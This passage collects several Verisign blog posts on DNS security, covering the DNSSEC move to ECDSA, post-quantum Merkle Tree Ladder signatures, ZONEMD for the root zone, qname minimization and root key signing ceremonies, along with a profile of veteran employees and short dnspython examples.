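response = dns.query.udp(query, "8.8.8.8", timeout=5)  # example validating resolver

# The AD flag indicates the resolver validated the DNSSEC chain of trust.
print("AD (authenticated data) flag set:", bool(response.flags & dns.flags.AD))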
Verisign has long been at the forefront of DNSSEC adoption. In 2010, a major milestone occurred when the Internet Corporation for Assigned Names and Numbers (ICANN) and Verisign signed the DNS root zone with DNSSEC. Shortly after, Verisign introduced DNSSEC to its TLDs, beginning with .edu in mid-2010, .net in late 2010, and .com in early 2011. Additional TLDs operated by Verisign were subsequently signed as well.
In the time since we signed our TLDs, we have worked continuously to help members of the internet ecosystem take advantage of DNSSEC. We do this through a wide range of activities, including publishing technical resources, leading educational sessions, and advocating for DNSSEC adoption in industry and technical forums.
Since the TLDs were first signed, we have observed two very distinct phases of growth in the number of signed second-level domains (SLDs).
The first growth phase occurred from 2012 to 2020. During that time, signed domains in the .com zone grew at about 0.1% of the base per year on average, reaching just over 1% by the end of 2020. In the .net zone, signed domains grew at about 0.1% of the base per year on average, reaching 1.2% by the end of 2020. These numbers demonstrated a slow but steady increase, which can be seen in Figure 1.
Figure 1: A chart spanning 2010 through the present shows the number of .com and .net domain names with DS – or Delegation Signer – records. These records form a link in the DNSSEC chain-of-trust for signed domains, indicating an uptick in DNSSEC adoption among SLDs.
We’ve observed more pronounced growth in signed SLDs during the second growth phase, which began in 2020. This is largely due to a single registrar that enabled DNSSEC by default for their new registrations. For .com, the annual rate increased to 0.9% of the base, and for .net, it increased to 1.1% of the base. Currently, 4.2% of .com domains are signed and 5.1% of .net domains are signed. This accelerated growth is also visible in Figure 1.
As we look forward, Verisign anticipates continued growth in the number of domains signed with DNSSEC. To support continued adoption and help further secure the DNS, we’re planning to make one very important change.
All Verisign TLDs are currently signed with DNSSEC algorithm 8, also known as RSA/SHA-256, as documented in our DNSSEC Practice Statements. We use a 2048-bit Key Signing Key (KSK) and 1280-bit Zone Signing Keys (ZSKs). The RSA algorithm has served us (and the broader internet) well for many years, but we wanted to take the opportunity to implement more robust security measures while also making more efficient use of resources that support DNSSEC-signed domain names.
We are planning to transition to the Elliptic Curve Digital Signature Algorithm (ECDSA), specifically Curve P-256 with SHA-256, or algorithm number 13, which allows for smaller signatures and improved cryptographic strength. This smaller signature size has a secondary benefit, as well: any potential DDoS attacks will have less amplification as a result of the smaller signatures. This could help protect victims from bad actors and cybercriminals.
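To check which algorithm a zone's published keys use today, you can inspect its DNSKEY records. Here is a minimal sketch in Python using the dnspython library (assumed installed); the algorithm numbers map to 8 for RSA/SHA-256 and 13 for ECDSA Curve P-256 with SHA-256:

import dns.resolver  # dnspython

# Print the algorithm number of each DNSKEY published for .com.
# 8 = RSA/SHA-256, 13 = ECDSA Curve P-256 with SHA-256.
for key in dns.resolver.resolve("com.", "DNSKEY"):
    print(f"flags={key.flags} algorithm={key.algorithm}")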
Support for DNSSEC signing and validation with ECDSA has been well-established by various managed DNS providers, 78 other TLDs, and nearly 10 million signed SLDs. Additionally, research performed by APNIC and NLnet Labs shows that ECDSA support in validating resolvers has increased significantly in recent years.
How did we get to this point? It took a lot of careful preparation and planning, but with internet stewardship at the forefront of our mission, we wanted to protect the DNS with the best technologies available to us. This means taking precise measures in everything we do, and this transition is no exception.
Algorithm 13 was on our radar for several years before we officially kicked off the implementation process this year. As mentioned previously, the primary motivating properties were the smaller signature size, with each signature being 96 bytes smaller than our current RSA signatures (160 bytes vs. 64 bytes), and the improved cryptographic strength. This helps us plan for the future and prepare for a world where more domain names are signed with DNSSEC.
Each TLD will first implement the rollover to algorithm 13 in Verisign’s Operational Test & Evaluation (OT&E) environment prior to implementing the process in production, for a total of two rollovers per TLD. Combined, this will result in six total rollovers across the .com, .net, and .edu TLDs. Rollovers between the individual TLDs will be spaced out to avoid overlap where possible.
The algorithm rollover for each TLD will follow this sequence of events:
Only when a successful rollover has been done in OT&E will we begin the process in production.
Now that we’ve given the background, we know you’re wondering: how might this affect me?
The change to a new DNSSEC-signing algorithm is expected to have no impact for the vast majority of internet users, service providers, and domain registrants. According to the aforementioned research by APNIC and NLnet Labs, most DNSSEC validators support ECDSA, and any that do not will simply ignore the signatures and still be able to resolve domains in Verisign-operated TLDs.
Regarding timing, we plan to begin to transition to ECDSA in the third and fourth quarters of this year. We will start the transition process with .edu, then .net, and then .com. We are currently aiming to have these three TLDs transitioned before the end of the fourth quarter 2023, but we will let the community know if our timeline shifts.
As leaders in DNSSEC adoption, this algorithm rollover demonstrates yet another critical step we are taking toward making the internet more secure, stable, and resilient. We look forward to enabling the change later this year, providing more efficient and stronger cryptographic security while optimizing resource utilization for DNSSEC-signed domain names.
The post Verisign Will Help Strengthen Security with DNSSEC Algorithm Update appeared first on Verisign Blog.
In 2021, we discussed a potential future shift from established public-key algorithms to so-called “post-quantum” algorithms, which may help protect sensitive information after the advent of quantum computers. We also shared some of our initial research on how to apply these algorithms to the Domain Name System Security Extensions, or DNSSEC. In the time since that blog post, we’ve continued to explore ways to address the potential operational impact of post-quantum algorithms on DNSSEC, while also closely tracking industry research and advances in this area.
Now, significant activities are underway that are setting the timeline for the availability and adoption of post-quantum algorithms. Since DNS participants – including registries and registrars – use public-key cryptography in a number of their systems, these systems may all eventually need to be updated to use the new post-quantum algorithms. We also announce two major contributions that Verisign has made in support of standardizing this technology: an Internet-Draft as well as a public, royalty-free license to certain intellectual property related to that Internet-Draft.
In this blog post, we review the changes that are on the horizon and what they mean for the DNS ecosystem, and one way we are proposing to ease the implementation of post-quantum signatures – Merkle Tree Ladder mode.
By taking these actions, we aim to be better prepared (while also helping others prepare) for a future where cryptanalytically relevant quantum computing and post-quantum cryptography become a reality.
In July 2022, the National Institute of Standards and Technology (NIST) selected one post-quantum encryption algorithm and three post-quantum signature algorithms for standardization, with standards for these algorithms arriving as early as 2024. In line with this work, the Internet Engineering Task Force (IETF) has also started standards development activities on applying post-quantum algorithms to internet protocols in various working groups, including the newly formed Post-Quantum Use in Protocols (PQUIP) working group. And finally, the National Security Agency (NSA) recently announced that National Security Systems are expected to transition to post-quantum algorithms by 2035.
Collectively, these announcements and activities indicate that many organizations are envisioning a (post-)quantum future, across many protocols. Verisign’s main concern continues to be how post-quantum cryptography impacts the DNS, and in particular, how post-quantum signature algorithms impact DNSSEC.
The standards being developed in the next few years are likely to be the ones deployed when the post-quantum transition eventually takes place, so now is the time to take operational requirements for specific protocols into account.
For DNSSEC, the operational concerns are twofold.
First, the large signature sizes of current post-quantum signatures selected by NIST would result in DNSSEC responses that exceed the size limits of the User Datagram Protocol, which is broadly deployed in the DNS ecosystem. While the Transmission Control Protocol and other transports are available, the additional overhead of having large post-quantum signatures on every response — which can be one to two orders of magnitude larger than traditional signatures — introduces operational risk to the DNS ecosystem that would be preferable to avoid.
Second, the large signatures would significantly increase memory requirements for resolvers using in-memory caches and authoritative nameservers using in-memory databases.
Figure 1, from Andy Fregly’s recent presentation at OARC 40, shows the impact on a fully signed DNS zone where, on average, there are 2.2 digital signatures per resource record set (covering both existence and non-existence proofs). The horizontal bars show the percentage of the zone file that would be comprised of signature data for the two prevalent current algorithms, RSA and ECDSA, and for the smallest and largest of the NIST PQC algorithms. At the low and high end of these examples, signatures with ECDSA would take up 40% of the zone and SPHINCS+ signatures would take up over 99% of the zone. The vertical bars give the percentage size increase of the zone file due to signatures. Again, comparing the low and high end, a zone fully signed with SPHINCS+ would be about 50 times the size of a zone fully signed with ECDSA.
In his 1988 article, “The First Ten Years of Public-Key Cryptography,” Whitfield Diffie, co-discoverer of public-key cryptography, commented on the lack of progress in finding public-key encryption algorithms that were as fast as the symmetric-key algorithms of the day: “Theorems or not, it seemed silly to expect that adding a major new criterion to the requirements of a cryptographic system could fail to slow it down.”
Diffie’s counsel also appears relevant to the search for post-quantum algorithms: It would similarly be surprising if adding the “major new criterion” of post-quantum security to the requirements of a digital signature algorithm didn’t impact performance in some way. Signature size may well be the tradeoff for post-quantum security, at least for now.
With this tradeoff in mind, Verisign’s post-quantum research team has explored ways to address the size impact, particularly to DNSSEC, arriving at a construction we call a Merkle Tree Ladder (MTL), a generalization of a single-rooted Merkle tree (see Figure 2). We have also defined a technique that we call the Merkle Tree Ladder mode of operation for using the construction with an underlying signature algorithm.
Similar to current deployments of public-key cryptography, MTL mode combines processes with complementary properties to balance performance and other criteria (see Table 1). In particular, in MTL mode, rather than signing individual messages with a post-quantum signature algorithm, ladders comprised of one or more Merkle tree nodes are signed using the post-quantum algorithm. Individual messages are then authenticated relative to the ladders using Merkle authentication paths.
Criterion to Achieve | Initial Design with a Single Process | Improved Design Combining Complementary Processes | Benefit
Public-Key Property for Encryption | Encrypt Individual Messages with Public-Key Algorithm | Establish Symmetric Keys Using Public-Key Algorithm; Encrypt Multiple Messages Using Each Symmetric Key | Amortize Cost of Public-Key Operations Across Multiple Messages
Post-Quantum Property for Signatures | Sign Individual Messages with Post-Quantum Algorithm | Sign Merkle Tree Ladders Using Post-Quantum Algorithm; Authenticate Multiple Messages Relative to Each Signed Ladder | Amortize Size of Post-Quantum Signature Across Multiple Messages
Although the signatures on the ladders might be relatively large, the ladders and their signatures are sent infrequently. In contrast, the Merkle authentication paths that are sent for each message are relatively short. The combination of the two processes maintains the post-quantum property while amortizing the size impact of the signatures across multiple messages. (Merkle tree constructions, being based on hash functions, are naturally post-quantum.)
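To make the Merkle authentication path idea concrete, here is a minimal, illustrative Python sketch of a single-rooted Merkle tree (a simplification of the ladder construction, and not Verisign's MTL specification): messages are hashed into a tree, the top node stands in for the signed ladder, and any single message can later be verified with just a short path of sibling hashes.

import hashlib

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def build_tree(messages):
    # Build hash levels from the leaf hashes up to a single top node.
    level = [h(m) for m in messages]
    levels = [level]
    while len(level) > 1:
        if len(level) % 2:
            level = level + [level[-1]]  # duplicate the last node on odd-sized levels
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        levels.append(level)
    return levels

def auth_path(levels, index):
    # Collect the sibling hash at each level; this short path is all a verifier needs.
    path = []
    for level in levels[:-1]:
        if len(level) % 2:
            level = level + [level[-1]]
        path.append(level[index ^ 1])
        index //= 2
    return path

def verify(message, index, path, top):
    node = h(message)
    for sibling in path:
        node = h(node + sibling) if index % 2 == 0 else h(sibling + node)
        index //= 2
    return node == top

messages = [b"record-1", b"record-2", b"record-3", b"record-4"]
levels = build_tree(messages)
top = levels[-1][0]  # in MTL mode, ladder nodes like this carry the (large) post-quantum signature
print(verify(b"record-3", 2, auth_path(levels, 2), top))  # True

Only the top node needs the expensive signature in this sketch; each message then travels with a few hashes, which is the size amortization the mode aims for.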
The two-part approach for public-key algorithms has worked well in practice. In Transport Layer Security, symmetric keys are established in occasional handshake operations, which may be more expensive. The symmetric keys are then used to encrypt multiple messages within a session without further overhead for key establishment. (They can also be used to start a new session).
We expect that a two-part approach for post-quantum signatures can similarly work well in an application like DNSSEC where verifiers are interested in authenticating a subset of messages from a large, evolving message series (e.g., DNS records).
In such applications, signed Merkle Tree Ladders covering a range of messages in the evolving series can be provided to a verifier occasionally. Verifiers can then authenticate messages relative to the ladders, given just a short Merkle authentication path.
Importantly, due to a property of Merkle authentication paths called backward compatibility, all verifiers can be given the same authentication path relative to the signer’s current ladder. This also helps with deployment in applications such as DNSSEC, since the authentication path can be published in place of a traditional signature. An individual verifier may verify the authentication path as long as the verifier has a previously signed ladder covering the message of interest. If not, then the verifier just needs to get the current ladder.
As reported in our presentation on MTL mode at the RSA Conference Cryptographers’ Track in April 2023, our initial evaluation of the expected frequency of requests for MTL mode signed ladders in DNSSEC is promising, suggesting that a significant reduction in effective signature size impact can be achieved.
To facilitate more public evaluation of MTL mode, Verisign’s post-quantum research team last week published the Internet-Draft “Merkle Tree Ladder Mode (MTL) Signatures.” The draft provides the first detailed, interoperable specification for applying MTL mode to a signature scheme, with SPHINCS+ as an initial example.
We chose SPHINCS+ because it is the most conservative of the NIST PQC algorithms from a cryptographic perspective, being hash-based and stateless. It is arguably most suited to be one of the algorithms in a long-term deployment of a critical infrastructure service like DNSSEC. With this focus, the specification has a “SPHINCS+-friendly” style. Implementers familiar with SPHINCS+ will find similar notation and constructions as well as common hash function instantiations. We are open to adding other post-quantum signature schemes to the draft or other drafts in the future.
Publishing the Internet-Draft is a first step toward the goal of standardizing a mode of operation that can reduce the size impact of post-quantum signature algorithms.
In support of this goal, Verisign also announced this week a public, royalty-free license to certain intellectual property related to the Internet-Draft published last week. Similar to other intellectual property rights declarations the company has made, we have announced a “Standards Development Grant” which provides the listed intellectual property under royalty-free terms for the purpose of facilitating standardization of the Internet-Draft we published on July 10, 2023. (The IPR declaration gives the official language.)
We expect to release an open-source implementation of the Internet-Draft soon, and, later this year, to publish an Internet-Draft on using MTL mode signatures in DNSSEC.
With these contributions, we invite implementers to take part in the next step toward standardization: evaluating initial versions of MTL mode to confirm whether they indeed provide practical advantages in specific use cases.
DNSSEC continues to be an important part of the internet’s infrastructure, providing cryptographic verification of information associated with the unique, stable identifiers in this ubiquitous namespace. That is why preparing for an eventual transition to post-quantum algorithms for DNSSEC has been and continues to be a key research and development activity at Verisign, as evidenced by our work on MTL mode and post-quantum DNSSEC more generally.
Our goal is that with a technique like MTL mode in place, protocols like DNSSEC can preserve the security characteristics of a pre-quantum environment while minimizing the operational impact of larger signatures in a post-quantum world.
In a later blog post, we’ll share more details on some upcoming changes to DNSSEC, and how these changes will provide both security and operational benefits to DNSSEC in the near term.
Verisign plans to continue to invest in research and standards development in this area, as we help prepare for a post-quantum future.
The post Next Steps in Preparing for Post-Quantum DNSSEC appeared first on Verisign Blog.
For Murray Green, working for a company that is a steward of critical internet infrastructure is a mission that he can get behind. Green, a senior engineering manager at Verisign, is a U.S. Army veteran who served during Operation Desert Storm and sees stewardship as a lifelong mission. In both roles, he has stayed focused on the success of the mission and cultivating great teamwork.
Teamwork is something that Laura Street, a software engineer and U.S. Air Force veteran, came to appreciate through her military service. It was then that she learned to appreciate how people from different backgrounds can work together on missions by finding their commonalities.
While military and civilian roles are very different, Verisign appeals to many veterans because of the mission-driven nature of the work we do.
Green and Street are two of the many veterans who have chosen to apply their military experience in a civilian career at Verisign. Both say that the work is not only rewarding to them, but to anyone who depends on Verisign’s commitment in helping to maintain the security, stability, and resiliency of the Domain Name System (DNS) and the internet.
At Verisign, we celebrate Military Appreciation Month by paying tribute to those who have served and recognizing how fortunate we are to work alongside amazing veterans whose contributions to our work provide enormous value.
Before joining the military, Murray Green studied electrical engineering but soon realized that his true passion was computer science. Looking for a way to pay for school and explore and excel as a Programmer Analyst, he turned to the U.S. Army.
He served more than four years at the Walter Reed Army Medical Center in Washington as the sole programmer for military personnel, using a proprietary language to maintain a reporting system that supplied data analysis. It was a role that helped him recognize the importance of data to any mission – whether for the U.S. Army or a company like Verisign.
At Walter Reed, he helped usher in the age of client-server computing, which dramatically reduced data processing time. “Around this time, personal computers connected to mini servers were just coming online so, using this new technology, I was able to unload data from the mainframe and bring it down to minicomputers running programs locally, which resulted in tasks being completed without the wait times associated with conventional mainframe computing,” he said. “I was there at the right time.”
His work led him to receive the Meritorious Service Medal, recognizing his expertise in the proprietary programming language that was used to assist in preparation for Operation Desert Storm, the first mobilization of U.S. Army personnel since Vietnam.
In the military, he also came to understand the importance of leadership – “providing purpose, direction, and motivation to accomplish the mission and improve the organization.”
Green has been at Verisign for over 20 years, starting off on the registry side of the business. In that role, he helped maintain the .com/.net top-level domain (TLD) name database, which, at the time, held 5 million domain names. Today, he still oversees this database, managing a highly skilled team that has helped provide uninterrupted resolution service for .com and .net for over a quarter of a century.
Street had been in medical school, looking for a way to pay for her continued education, when she heard about the military’s Health Professional Scholarship Program and turned to the U.S. Air Force.
“I met some terrific people in the military,” she said. “My favorite experiences involved working with people who cared about others and were able to motivate them with positivity.” But it was the sense of teamwork she encountered in the military that left a lasting impression.
“There’s a sense of accountability and concern for others,” she said. “You help one another.”
While working in the Education and Training department, she collaborated with a support team to troubleshoot a video that wasn’t loading properly and was impressed with how the developers worked to fix the problem. She immediately took an interest in programming and enrolled in night classes at a local community college. After completing her service in the U.S. Air Force, she went back to school to pursue a bachelor’s degree in computer science.
She’s been at Verisign for two years and, while the job itself is rewarding because it taps into so many of her interests – from Java programming to network protection and packet analysis – it was the chemistry with the team that was most enticing about the role.
“I felt as at-ease as one can possibly feel during a technical interview,” she said. “I got the sense that these were people who I would want to work with.”
Street credits the military for teaching her valuable communication and teamwork skills that she continues to apply in her role, which focuses on keeping the .com and .net top-level-domains available around the clock, around the world.
Both Green and Street encourage service members to stay focused on the success of their personal missions and the teamwork they learned in the military, and to leverage those skills in the civilian world. Use your service as a selling point and understand that companies value that background more than you think, they said.
“Being proud of the service we provide to others and paying attention to details allows us at Verisign to make a global difference,” Green said. “The veterans on our team bring an incredible skillset that is highly valued here. I know that I’m a part of an incredible team at Verisign.”
Verisign is proud to create career opportunities where veterans can apply their military training. To learn more about our current openings, visit Verisign Careers.
The post Verisign Honors Vets in Technology For Military Appreciation Month appeared first on Verisign Blog.
The Domain Name System (DNS) root zone will soon be getting a new record type, called ZONEMD, to further ensure the security, stability, and resiliency of the global DNS in the face of emerging new approaches to DNS operation. While this change will be unnoticeable for the vast majority of DNS operators (such as registrars, internet service providers, and organizations), it provides a valuable additional layer of cryptographic security to ensure the reliability of root zone data.
In this blog, we’ll discuss these new proposals, as well as ZONEMD. We’ll share deployment plans, how they may affect certain users, and what DNS operators need to be aware of beforehand to ensure little-to-no disruptions.
The DNS root zone is the starting point for most domain name lookups on the internet. The root zone contains delegations to nearly 1,500 top-level domains, such as .com, .net, .org, and many others. Since its inception in 1984, various organizations known collectively as the Root Server Operators have provided the service for what we now call the Root Server System (RSS). In this system, a myriad of servers respond to approximately 80 billion root zone queries each day.
While the RSS continues to perform this function with a high degree of dependability, there are recent proposals to use the root zone in a slightly different way. These proposals create some efficiencies for DNS operators, but they also introduce new challenges.
In 2020, the Internet Engineering Task Force (IETF) published RFC 8806, titled “Running a Root Server Local to a Resolver.” Along the same lines, in 2021 the Internet Corporation for Assigned Names and Numbers (ICANN) Office of the Chief Technology Officer published OCTO-027, titled “Hyperlocal Root Zone Technical Analysis.” Both proposals share the idea that recursive name servers can receive and load the entire root zone locally and respond to root zone queries directly.
But in a scenario where the entire root zone is made available to millions of recursive name servers, a new question arises: how can consumers of zone data verify that zone content has not been modified before reaching their systems?
One might imagine that DNS Security Extensions (DNSSEC) could help. However, while the root zone is indeed signed with DNSSEC, most of the records in the zone are considered non-authoritative (i.e., all the NS and glue records) and therefore do not have signatures. What about something like a Pretty Good Privacy (PGP) signature on the root zone file? That comes with its own challenge: in PGP, the detached signature is easily separated from the data. For example, there is no way to include a PGP signature over DNS zone transfer, and there is no easy way to know which version of the zone goes with the signature.
A solution to this problem comes from RFC 8976. Led by Verisign and titled “Message Digest for DNS Zones” (known colloquially as ZONEMD), this protocol calls for a cryptographic digest of the zone data to be embedded into the zone itself. This ZONEMD record can then be signed and verified by consumers of the zone data. Here’s how it works:
Each time a zone is updated, the publisher calculates the ZONEMD record by sorting and canonicalizing all the records in the zone and providing them as input to a message digest function. Sorting and canonicalization are the same as for DNSSEC. In fact, the ZONEMD calculation can be performed at the same time the zone is signed. Digest calculation necessarily excludes the ZONEMD record itself, so the final step is to update the ZONEMD record and its signatures.
A recipient of a zone that includes a ZONEMD record repeats the same calculation and compares its calculated digest value with the published digest. If the zone is signed, then the recipient can also validate the correctness of the published digest. In this way, recipients can verify the authenticity of zone data before using it.
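As an illustration of the recipient side, the sketch below (Python with the dnspython library; it assumes a local copy of the root zone saved as root.zone and a dnspython release recent enough to understand the ZONEMD type) loads the zone and prints its published ZONEMD record. A full verifier would then recompute the digest over the sorted, canonicalized zone data, as described above, and compare it to the published value:

import dns.zone  # dnspython (a release that knows the ZONEMD type is assumed)

# Load a locally saved copy of the root zone and print its published ZONEMD record.
zone = dns.zone.from_file("root.zone", origin=".")
zonemd = zone.get_rdataset("@", "ZONEMD")
print(zonemd)
# A full verifier would recompute the digest over the canonicalized zone
# (excluding the ZONEMD record itself) and compare it to the digest printed here.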
A number of open-source DNS software products now include, or soon will include, support for ZONEMD verification. These include Unbound (version 1.13.2), NSD (version 4.3.4), Knot DNS (version 3.1.0), PowerDNS Recursor (version 4.7.0) and BIND (version 9.19).
Verisign, ICANN, and the Root Server Operators are taking steps to ensure that the addition of the ZONEMD record in no way impacts the ability of the root server system to receive zone updates and to respond to queries. As a result, most internet users are not affected by this change.
Anyone using RFC 8806, or a similar technique to load root zone data into their local resolver, is unlikely to be affected as well. Software products that implement those features should be able to fully process a zone that includes the new record type, especially for reasons described below. Once the record has been added, users can take advantage of ZONEMD verification to ensure root zone data is authentic.
Users most likely to be affected are those that receive root zone data from the internic.net servers (or some other source) and use custom software to parse the zone file. Depending on how such custom software is designed, there is a possibility that it will treat the new ZONEMD record as unexpected and lead to an error condition. Key objectives of this blog post are to raise awareness of this change, provide ample time to address software issues, and minimize the likelihood of disruptions for such users.
In 2020, Verisign asked the Root Zone Evolution Review Committee (RZERC) to consider a proposal for adding data protections to the root zone using ZONEMD. In 2021, the RZERC published its recommendations in RZERC003. One of those recommendations was for Verisign and ICANN to develop a deployment plan and make the community aware of the plan’s details. That plan is summarized in the remainder of this blog post.
One attribute of a ZONEMD record is the choice of a hash algorithm used to create the digest. RFC 8976 defines two standard hash algorithms – SHA-384 and SHA-512 – and a range of “private-use” algorithms.
Initially, the root zone’s ZONEMD record will have a private-use hash algorithm. This allows us to first include the record in the zone without anyone worrying about the validity of the digest values. Since the hash algorithm is from the private-use range, a consumer of the zone data will not know how to calculate the digest value. A similar technique, known as the “Deliberately Unvalidatable Root Zone,” was utilized when DNSSEC was added to the root zone in 2010.
After a period of more than two months, the ZONEMD record will transition to a standard hash algorithm.
SHA-384 has been selected for the initial implementation for compatibility reasons.
The developers of BIND implemented the ZONEMD protocol based on an early Internet-Draft, some time before it was published as an RFC. Unfortunately, the initial BIND implementation only accepts ZONEMD records with a digest length of 48 bytes (i.e., the SHA-384 length). Since the versions of BIND with this behavior are in widespread use today, use of the SHA-512 hash algorithm would likely lead to problems for many BIND installations, possibly including some Root Server Operators.
Distribution of the zone between the Root Zone Maintainer and Root Server Operators primarily takes place via the DNS zone transfer protocol. In this protocol, zone data is transmitted in “wire format.”
The root zone is also stored and served as a file on the internic.net FTP and web servers. Here, the zone data is in “presentation format.” The ZONEMD record will appear in these files using its native presentation format. For example:
. 86400 IN ZONEMD 2021101902 1 1 ( 7d016e7badfd8b9edbfb515deebe7a866bf972104fa06fec
e85402cc4ce9b69bd0cbd652cec4956a0f206998bfb34483 )
Some users of zone data received from the FTP and web servers might currently be using software that does not recognize the ZONEMD presentation format. These users might experience some problems when the ZONEMD record first appears. We did consider using a generic record format; however, in consultation with ICANN, we believe that the native format is a better long-term solution.
Currently, we are targeting the initial deployment of ZONEMD in the root zone for September 13, 2023. As previously stated, the ZONEMD record will be published first with a private-use hash algorithm number. We are targeting December 6, 2023, as the date to begin using the SHA-384 hash algorithm, at which point the root zone ZONEMD record will become verifiable.
Deploying ZONEMD in the root zone helps to increase the security, stability, and resiliency of the DNS. Soon, recursive name servers that choose to serve root zone data locally will have stronger assurances as to the zone’s validity.
If you’re interested in following the ZONEMD deployment progress, please look for our announcements on the DNS Operations mailing list.
The post Adding ZONEMD Protections to the Root Zone appeared first on Verisign Blog.
Over the past several years, domain name queries – a critical element of internet communication – have quietly become more secure, thanks, in large part, to a little-known set of technologies that are having a global impact. Verisign CTO Dr. Burt Kaliski covered these in a recent Internet Protocol Journal article, and I’m excited to share more about the role Verisign has performed in advancing this work and making one particular technology freely available worldwide.
The Domain Name System (DNS) has long followed a traditional approach of answering queries, where resolvers send a query with the same fully qualified domain name to each name server in a chain of referrals. Then, they generally apply the final answer they receive only to the domain name that was queried for in the original request.
But recently, DNS operators have begun to deploy various “minimization techniques” – techniques aimed at reducing both the quantity and sensitivity of information exchanged between DNS ecosystem components as a means of improving DNS security. Why the shift? As we discussed in a previous blog, it’s all in the interest of bringing the process closer to the “need-to-know” security principle, which emphasizes the importance of sharing only the minimum amount of information required to complete a task or carry out a function. This effort is part of a general, larger movement to reduce the disclosure of sensitive information in our digital world.
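As a rough illustration of the difference, the sketch below (Python with the dnspython library; the names, query type, and the a.gtld-servers.net address are illustrative assumptions) shows the kind of query a minimizing resolver sends to a TLD server: only the next label it needs resolved, typically with the NS type, rather than the full original query name.

import dns.message
import dns.query  # dnspython

# Traditional behavior: the resolver would send the full name, e.g.
# "www.example.com. A", to the root and .com servers.
# With qname minimization, the .com server is asked only for the
# delegation of the next label: "example.com. NS".
query = dns.message.make_query("example.com.", "NS")
response = dns.query.udp(query, "192.5.6.30", timeout=5)  # a.gtld-servers.net (illustrative)
for rrset in response.authority + response.answer:
    print(rrset)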
As part of Verisign’s commitment to security, stability, and resiliency of the global DNS, the company has worked both to develop qname minimization techniques and to encourage the adoption of DNS minimization techniques in general. We believe strongly in this work since these techniques can reduce the sensitivity of DNS data exchanged between resolvers and both root and TLD servers without adding operational risk to authoritative name server operations.
To help advance this area of technology, in 2015, Verisign announced a royalty-free license to its qname minimization patents in connection with certain Internet Engineering Task Force (IETF) standardization efforts. There’s been a steady increase in support and deployment since that time; as of this writing, roughly 67% of probes were utilizing qname-minimizing resolvers, according to statistics hosted by NLnet Labs. That’s up from just 0.7% in May 2017 – a strong indicator of minimization techniques’ usefulness to the community. At Verisign, we are seeing similar trends with approximately 65% of probes utilizing qname-minimizing resolvers in queries with two labels at .com and .net authoritative name servers, as shown in Figure 1 below.
Kaliski’s article, titled “Minimized DNS Resolution: Into the Penumbra,” explores several specific minimization techniques documented by the IETF, reports on their implementation status, and discusses the effects of their adoption on DNS measurement research. An expanded version of the article can be found on the Verisign website.
This piece is just one of the latest to demonstrate Verisign’s continued investment in research and standards development in the DNS ecosystem. As a company, we’re committed to helping shape the DNS of today and tomorrow, and we recognize this is only possible through ongoing contributions by dedicated members of the internet infrastructure community – including the team here at Verisign.
Read more about Verisign’s contributions to this area:
Minimum Disclosure: What Information Does a Name Server Need to Do Its Job? (blog)
Maximizing Qname Minimization: A New Chapter in DNS Protocol Evolution (blog)
Information Protection for the Domain Name System: Encryption and Minimization (blog)
The post Minimized DNS Resolution: Into the Penumbra appeared first on Verisign Blog.
Every few months, an important ceremony takes place. It’s not splashed all over the news, and it’s not attended by global dignitaries. It goes unnoticed by many, but its effects are felt across the globe. This ceremony helps make the internet more secure for billions of people.
This unique ceremony began in 2010 when Verisign, the Internet Corporation for Assigned Names and Numbers (ICANN), and the U.S. Department of Commerce’s National Telecommunications and Information Administration collaborated – with input from the global internet community – to deploy a technology called Domain Name System Security Extensions (DNSSEC) to the Domain Name System (DNS) root zone in a special ceremony. This wasn’t a one-off occurrence in the history of the DNS, though. Instead, these organizations developed a set of processes, procedures, and schedules that would be repeated for years to come. Today, these recurring ceremonies help ensure that the root zone is properly signed, and as a result, the DNS remains secure, stable, and resilient.
In this blog, we take the opportunity to explain these ceremonies in greater detail and describe the critical role that Verisign is honored to perform.
DNSSEC is a series of technical specifications that allow operators to build greater security into the DNS. Because the DNS was not initially designed as a secure system, DNSSEC represented an essential leap forward in securing DNS communications. Deploying DNSSEC allows operators to better protect their users, and it helps to prevent common threats such as “man-in-the-middle” attacks. DNSSEC works by using public key cryptography, which allows zone operators to cryptographically sign their zones. This allows anyone communicating with and validating a signed zone to know that their exchanges are genuine.
The root zone, like most signed zones, uses separate keys for zone signing and for key signing. The Key Signing Key (KSK) is separate from the Zone Signing Key (ZSK). However, unlike most zones, the root zone’s KSK and ZSK are operated by different organizations; ICANN serves as the KSK operator and Verisign as the ZSK operator. These separate roles for DNSSEC align naturally with ICANN as the Root Zone Manager and Verisign as the Root Zone Maintainer.
In practice, the KSK/ZSK split means that the KSK only signs the DNSSEC keys, and the ZSK signs all the other records in the zone. Signing with the KSK happens infrequently – only when the keys change. However, signing with the ZSK happens much more frequently – whenever any of the zone’s other data changes.
Something to keep in mind before we go further: remember that DNSSEC utilizes public key cryptography, in which keys have both a private and public component. The private component is used to generate signatures and must be guarded closely. The public component is used to verify signatures and can be shared openly. Good cryptographic hygiene says that these keys should be changed (or “rolled”) periodically.
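The division of labor between the private and public components can be shown in a few lines of code. This sketch uses the third-party Python "cryptography" package and an Ed25519 key purely for brevity; it illustrates the sign/verify split, not the root zone’s actual algorithms or tooling.

from cryptography.hazmat.primitives.asymmetric import ed25519
from cryptography.exceptions import InvalidSignature

private_key = ed25519.Ed25519PrivateKey.generate()   # guarded closely by the signer
public_key = private_key.public_key()                # shared openly with validators

zone_data = b"example. 3600 IN A 192.0.2.1"
signature = private_key.sign(zone_data)              # only the private key can produce this

try:
    public_key.verify(signature, zone_data)          # anyone with the public key can check it
    print("signature valid")
except InvalidSignature:
    print("signature invalid")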
In DNSSEC, changing a KSK is generally difficult, whereas changing a ZSK is relatively easy. This is especially true for the root zone where a KSK rollover requires all validating recursive name servers to update their copy of the trust anchor. Whereas the first and only KSK rollover to date happened after a period of eight years, ZSK rollovers take place every three months. Not coincidentally, this is also how often root zone key signing ceremonies take place.
The notion of holding a “ceremony” for such an esoteric technical function may seem strange, but this ceremony is very different from what most people are used to. Our common understanding of the word “ceremony” brings to mind an event with speeches and formal attire. But in this case, the meaning refers simply to the formality and ritual aspects of the event.
There are two main reasons for holding key signing ceremonies. One is to bring participants together so that everyone may transparently witness the process. Ceremony participants include ICANN staff, Verisign staff, Trusted Community Representatives (TCRs), and external auditors, plus guests on occasion.
The other important reason, of course, is to generate DNSSEC signatures. Occasionally other activities take place as well, such as generating new keys, retiring equipment, and changing TCRs. In this post, we’ll focus only on the signature generation procedures.
